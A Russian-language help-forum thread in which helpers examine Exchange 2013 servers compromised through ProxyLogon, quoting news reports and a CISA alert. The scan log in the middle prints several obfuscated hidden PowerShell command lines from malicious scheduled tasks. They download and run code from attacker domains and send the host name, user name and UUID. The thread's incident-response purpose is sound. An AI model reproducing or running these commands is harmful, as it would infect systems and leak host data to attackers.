MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить. , ProxyLogon

RSS
Здравствуйте. MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить. Удалять сам не стал из "шидулера", реестра. Обновления на двух серверах уже установили, закрывающую уязвимость. Если будут еще какие то комментарии напишите пожалуйста.
Положу сюда сразу два образа двух серверов. Если необходимо могу тему скопировать, по одному образу выложу.
Изменено: Владимир Шариков - 18.03.2021 17:16:52

Ответы

Цитата
santy написал:
[QUOTE] Владимир Шариков написал:
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?
я думаю стоит.  эксплойт для ProxyLogon, по словам исследователей, мог использоваться в теч двух месяцев, до выхода мартовского обновления от Microsoft. (Возможно, была утечка эксплойта через поставщиков ПО, которые имеют ранний доступ к полученным сообщениям от исследователей)
Цитата
После выхода официальных исправлений даже для неподдерживаемых версий уязвимые серверы Microsoft Exchange, напрямую открытые в Интернете, стали еще более горячей целью, поскольку злоумышленники могли перепроектировать обновления для создания эксплойта.

ESET видела, что более 10 групп APT бросились атаковать непропатченные устройства. Многие из них занимались кибершпионажем, и в этот список входят Mikroceen и Tonto Team, но не все.

Исследователи заметили активность группы, которую они называют «Opera» Cobalt Strike, которая использовала уязвимости Microsoft Exchange для установки продукта для тестирования на проникновение Cobalt Strike, который является обычным для некоторых известных кибергрупп Ransomware.

В другом случае ESET заметил, что злоумышленник сбрасывает веб-оболочки, чтобы «установить так называемые бэкдоры IIS». Активность, приписываемая ботнету DLTMiner [1, 2], занимающемуся майнингом криптовалют, была замечена на серверах, которые были атакованы с помощью уязвимостей ProxyLogon.

Цитата
Вице-президент Mandiant по анализу, Джон Халтквист, ожидает, что в ближайшее время банды вымогателей будут еще больше использовать уязвимости ProxyLogon, которые могут найти вектор атаки «особенно привлекательным», поскольку он является «эффективным средством получения доступа администратора домена».

«Этот доступ позволяет им развертывать шифрование на предприятии. В случаях, когда организации не исправлены, эти уязвимости предоставят преступникам более быстрый путь к успеху », - Джон Халтквист.

более подробно, здесь
https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/
задачи, которые были запущены через powershell(Имя компьютера: SPHVMAIL01), проверьте так же наличие новых учетных записей в домене.

Цитата
Полное имя                  C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
Имя файла                   POWERSHELL.EXE

Цифр. подпись               Действительна, подписано Microsoft Windows
                           
Оригинальное имя            PowerShell.EXE.MUI
Версия файла                6.3.9600.17396 (winblue_r4.141007-2030)
Описание                    Windows PowerShell
Производитель               Microsoft Corporation
                           
Доп. информация             на момент обновления списка
CmdLine                     -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
CmdLine                     -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine                     -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine                     -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
CmdLine                     -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine                     -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
SHA1                        9F1E24917EF96BBB339F4E2A226ACAFD1009F47B
MD5                         C031E215B8B08C752BF362F6D4C5D3AD
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\A5TORJ3ZT
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\AVCZOHW
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\JCA9PD
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\eUuwdKQkPqT\SMYVSZ­Y4OWX
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\O6YM9I
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\Xnqm40cRo\ZUPKUTWN
Устранение уязвимостей Microsoft Exchange Server

Цитата
Партнеры по кибербезопасности и безопасности инфраструктуры (CISA) наблюдали активное использование уязвимостей в продуктах Microsoft Exchange Server. Успешное использование этих уязвимостей позволяет злоумышленнику, не прошедшему проверку подлинности, выполнить произвольный код на уязвимых серверах Exchange Server, что позволяет злоумышленнику получить постоянный доступ к системе, а также доступ к файлам и почтовым ящикам на сервере и учетным данным, хранящимся в этой системе. Успешная эксплуатация может дополнительно позволить злоумышленнику нарушить доверие и идентификацию в уязвимой сети. Microsoft выпустила внеполосные патчи для устранения уязвимостей в Microsoft Exchange Server. Уязвимости влияют на локальные серверы Microsoft Exchange и, как известно, не влияют на облачные почтовые службы Exchange Online или Microsoft 365 (ранее O365).

Это предупреждение включает в себя как тактику, методы и процедуры (TTP), так и индикаторы компрометации (IOC), связанные с этой злонамеренной деятельностью. Чтобы обезопасить себя от этой угрозы, CISA рекомендует организациям проверять свои системы на предмет наличия TTP и использовать IOC для обнаружения любых вредоносных действий. Если организация обнаруживает действия по эксплуатации, она должна предположить компрометацию сетевой идентичности и следовать процедурам реагирования на инциденты. Если организация не обнаруживает активности, она должна немедленно применить доступные исправления и реализовать меры по снижению риска, указанные в этом предупреждении.
подробнее здесь:
https://us-cert.cisa.gov/ncas/alerts/aa21-062a
Читают тему (гостей: 1)